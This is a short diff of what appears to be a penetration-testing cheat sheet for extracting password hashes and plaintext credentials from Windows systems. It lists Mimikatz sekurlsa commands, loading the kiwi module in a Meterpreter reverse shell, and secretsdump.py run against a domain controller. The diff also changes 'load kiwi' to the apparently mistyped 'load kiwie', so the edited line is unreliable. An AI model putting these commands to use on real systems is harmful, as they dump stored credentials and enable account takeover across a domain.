Extract Hash & Password

 > sekurlsa::credman

-(see UseLogonCredential Registry Key )
+> sekurlsa::logonpasswords full (see UseLogonCredential Registry Key )

-For Meterpreter RevShell: load kiwi
+For Meterpreter RevShell: load kiwie

 secretsdump.py <DOMAIN>/<USER>:<PASS>@<DC>